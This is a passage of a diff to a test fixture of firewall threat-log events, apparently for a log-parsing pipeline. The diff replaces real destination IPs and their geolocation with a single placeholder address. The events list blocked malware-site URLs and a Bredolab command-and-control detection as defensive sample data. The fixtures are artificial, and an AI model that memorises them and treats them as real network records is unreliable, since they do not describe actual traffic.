04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5384,7 +5361,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:8JiI5Ka3Oyz6yaLm3xObTqAo/Jw=", + "community_id": "1:46UstfGPWeZVxrzoO9FBbSk5buo=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -5420,14 +5397,14 @@ ], "ip": [ "192.168.0.2", - "208.73.210.29", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545598303Z", - "original": "Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079238500Z", + "original": "Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:47:17.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -5450,23 +5427,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 40034, + "number": 4837, "organization": { - "name": "Confluence Networks Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.73.210.29" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5482,7 +5461,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/gwc.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/gwc.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5523,7 +5502,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:lOdKYo+aMIHRMMJPawuXy8Bk2I0=", + "community_id": "1:fEjmFv/r7P1mfCuztp/sNazEdmg=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -5559,14 +5538,14 @@ ], "ip": [ "192.168.0.2", - "208.73.210.29", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545605471Z", - "original": "Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/gwc.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079244200Z", + "original": "Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/gwc.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:47:17.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -5589,26 +5568,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5624,7 +5602,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5665,7 +5643,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:rDRkkTH2aHta89i52OraqG5WcDI=", + "community_id": "1:Itoh3MIE1ST0EL8MzzvZn6JtmTQ=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -5701,14 +5679,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545612531Z", - "original": "Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079250Z", + "original": "Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:51:03.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -5731,23 +5709,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 40034, + "number": 4837, "organization": { - "name": "Confluence Networks Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.73.210.29" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5763,7 +5743,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,\"findnolimits.com/go.php?sid=1\",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,\"findnolimits.com/go.php?sid=1\",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5804,7 +5784,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:00fHGTkjtblnJQ9P4Wiw9QuDEpI=", + "community_id": "1:Ys9Ml4mGCmU2eiSE7dR++eJlyOA=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -5840,14 +5820,14 @@ ], "ip": [ "192.168.0.2", - "208.73.210.29", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545619746Z", - "original": "Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,\"findnolimits.com/go.php?sid=1\",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079255900Z", + "original": "Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,\"findnolimits.com/go.php?sid=1\",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:51:23.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -5870,23 +5850,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Russian Federation", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 - }, - "country_iso_code": "RU" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 197695, + "number": 4837, "organization": { - "name": "Domain names registrar REG.RU, Ltd" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "89.108.64.156" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5902,7 +5884,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/moun.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/moun.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5943,7 +5925,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:sQ6YL9T0OZftMg71BK+1IHpXIRM=", + "community_id": "1:zO0hayGDH/CHTey82VssD6lNSiU=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -5979,14 +5961,14 @@ ], "ip": [ "192.168.0.2", - "89.108.64.156", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545626922Z", - "original": "Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/moun.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "ingested": "2021-12-09T13:42:59.079261700Z", + "original": "Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/moun.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2012-10-30T09:51:33.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6009,23 +5991,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Russian Federation", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 - }, - "country_iso_code": "RU" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 197695, + "number": 4837, "organization": { - "name": "Domain names registrar REG.RU, Ltd" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "89.108.64.156" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6041,7 +6025,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/palast.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/palast.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6082,7 +6066,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:a3rlKRtYt43mps+uHBznJUtG3Qg=", + "community_id": "1:u3SLWX+WInAjEpFvbgZJ7ppjDRY=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -6118,14 +6102,14 @@ ], "ip": [ "192.168.0.2", - "89.108.64.156", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545634212Z", - "original": "Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/palast.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "ingested": "2021-12-09T13:42:59.079267400Z", + "original": "Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/palast.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2012-10-30T09:51:33.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6162,28 +6146,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, - "message": "204.232.231.46,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6224,7 +6207,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:gfZAOGdC3xAoPZCFZCwHJJ7Iin4=", + "community_id": "1:1QAo/7Uu2ZnQ3tX0xM16HUiNjrs=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" @@ -6259,15 +6242,15 @@ "crusher" ], "ip": [ - "204.232.231.46", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 1, - "ingested": "2021-09-08T12:37:05.545641375Z", - "original": "Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,204.232.231.46,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079273200Z", + "original": "Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2012-10-30T09:53:33.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6287,26 +6270,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "CA-ON", - "city_name": "Kitchener", - "country_iso_code": "CA", - "country_name": "Canada", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Canada", - "region_name": "Ontario", + "region_name": "Jilin", "location": { - "lon": -80.4216, - "lat": 43.4419 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 13727, + "number": 4837, "organization": { - "name": "NEXT DIMENSION INC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "216.8.179.25" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6322,7 +6304,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,216.8.179.25,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,\"www.15min.it/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,\"www.15min.it/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6363,7 +6345,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:VeoAydUSFUdh8ZddIqbsMY32sBU=", + "community_id": "1:fAZZS4QiYR9HRv2mpevkcTa8bEI=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -6399,14 +6381,14 @@ ], "ip": [ "192.168.0.2", - "216.8.179.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545648429Z", - "original": "Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,216.8.179.25,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,\"www.15min.it/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0,", + "ingested": "2021-12-09T13:42:59.079277300Z", + "original": "Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,\"www.15min.it/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0,", "created": "2012-10-30T09:53:38.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6429,23 +6411,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 22489, + "number": 4837, "organization": { - "name": "Castle Access Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "69.43.161.154" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6461,7 +6445,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,69.43.161.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,\"tubemov.com/\",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,\"tubemov.com/\",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6502,7 +6486,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ZsFVG8FJVifp8WmzI9Zj/lo+dB4=", + "community_id": "1:xI/vHpVryFpDr9TeLpa+sn06lIg=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -6538,14 +6522,14 @@ ], "ip": [ "192.168.0.2", - "69.43.161.154", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545655591Z", - "original": "Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,69.43.161.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,\"tubemov.com/\",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079282Z", + "original": "Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,\"tubemov.com/\",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:53:48.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -6568,23 +6552,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "British Virgin Islands", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Virgin Islands British", + "region_name": "Jilin", "location": { - "lon": -64.5, - "lat": 18.5 - }, - "country_iso_code": "VG" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 40034, + "number": 4837, "organization": { - "name": "Confluence Networks Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.91.196.252" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6600,7 +6586,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,208.91.196.252,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,\"pagesinxt.com/?dn=teenstube.us\u0026flrdr=yes\u0026nxte=js\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,\"pagesinxt.com/?dn=teenstube.us\u0026flrdr=yes\u0026nxte=js\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0,", "panw": { "panos": { "ruleset": "rule1", @@ -6641,7 +6627,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:NAfQ33YdKJSvbcxpFK8HIhI39lk=", + "community_id": "1:UYDmWKyJJKqYep7xR0rD4zO6+ME=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -6677,14 +6663,14 @@ ], "ip": [ "192.168.0.2", - "208.91.196.252", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545662712Z", - "original": "Oct 30 09:53:58 1,2012/10/30 